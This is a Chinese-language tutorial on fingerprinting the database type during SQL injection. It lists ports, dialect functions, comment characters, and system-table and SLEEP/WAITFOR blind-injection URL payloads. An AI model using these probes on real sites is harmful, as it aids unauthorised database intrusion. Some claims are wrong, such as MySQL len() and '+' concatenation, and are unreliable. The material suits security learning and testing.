SQL注入如何判断数据库类型

前言

在进行SQL注入之前,首先应该判断数据库的类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库的类型选择合适的函数,更容易实现SQL注入。

# 前端与数据库类型

复制代码
asp:SQL Server,Access

.net:SQL Server

php:MySQL,PostgreSQL

java:Oracle,MySQL

# 根据端口判断

复制代码
Oracle:默认端口 1521

SQL Server:默认端口 1433

MySQL:默认端口 3306

# 根据数据库特有函数来判断

# len和length

复制代码
len():SQL Server 、MySQL以及db2返回长度的函数。

length():Oracle和INFORMIX返回长度的函数。

# version和@@version

复制代码
version():MySQL查询版本信息的函数

@@version:MySQL和SQL Server查询版本信息的函数

# substring和substr

复制代码
MySQL两个函数都可以使用

Oracle只可调用substr

SQL Server只可调用substring

# 根据特殊符号进行判断

复制代码
/* 是MySQL数据库的注释符

-- 是Oracle和SQL Server支持的注释符

;  是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库

#  是MySQL中的注释符,返回错误则说明可能不是MySQL,另外也支持-- 和/**/

# 根据数据库对字符串的处理方式判断

# MySQL

复制代码
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab'

# Oracle

复制代码
http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab'

http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 

# SQL Server

复制代码
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

# 根据数据库特有的数据表来判断

# MySQL(version>5.0)

复制代码
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

# Oracle

复制代码
http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

# SQL Server

复制代码
http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

# 根据盲注特别函数判断

# MySQL

复制代码
BENCHMARK(1000000,ENCODE('QWE','ASD'))

SLEEP(5)

# PostgreSQL

复制代码
PG_SLEEP(5)

GENERATE_SERIES(1,1000000)

# SQL Server

复制代码
WAITFOR DELAY '0:0:5'
相关推荐
嘘神秘用3 小时前
布:AI 驱动的 Redis 客户端,更快、更直观
数据库·人工智能·redis
其实防守也摸鱼5 小时前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
东北小狐狸-Hellxz5 小时前
Redis 哨兵搭建+ACL权限控制
数据库·redis
研究员子楚6 小时前
GEO行业发展标准体系白皮书V2.0-第09卷 · 适配篇:硅基主权伦理宪章与行业适配宣言
数据库·人工智能·geo
l134062082358 小时前
鸿蒙实战:RDB 数据库设计与 DatabaseService
数据库·华为·harmonyos·鸿蒙系统
山峰哥8 小时前
数据库工程与索引策略实战指南‌
服务器·数据库·sql·oracle·深度优先
谙忆8 小时前
图片版权保护工程实战:明水印、盲水印(DCT隐写)、Referer防盗链与签名URL怎么落地
数据库
KaMeidebaby8 小时前
卡梅德生物技术快报|抗体合成:多肽抗体合成工程化方案:Nsp2 保守肽多抗制备与多维度验证
前端·网络·数据库·人工智能·算法
xfhuangfu8 小时前
19c CDB架构下的数据库启动和停止
数据库·架构
神道君天下8 小时前
填充与积累:积分与面积的可视化
数据库·oracle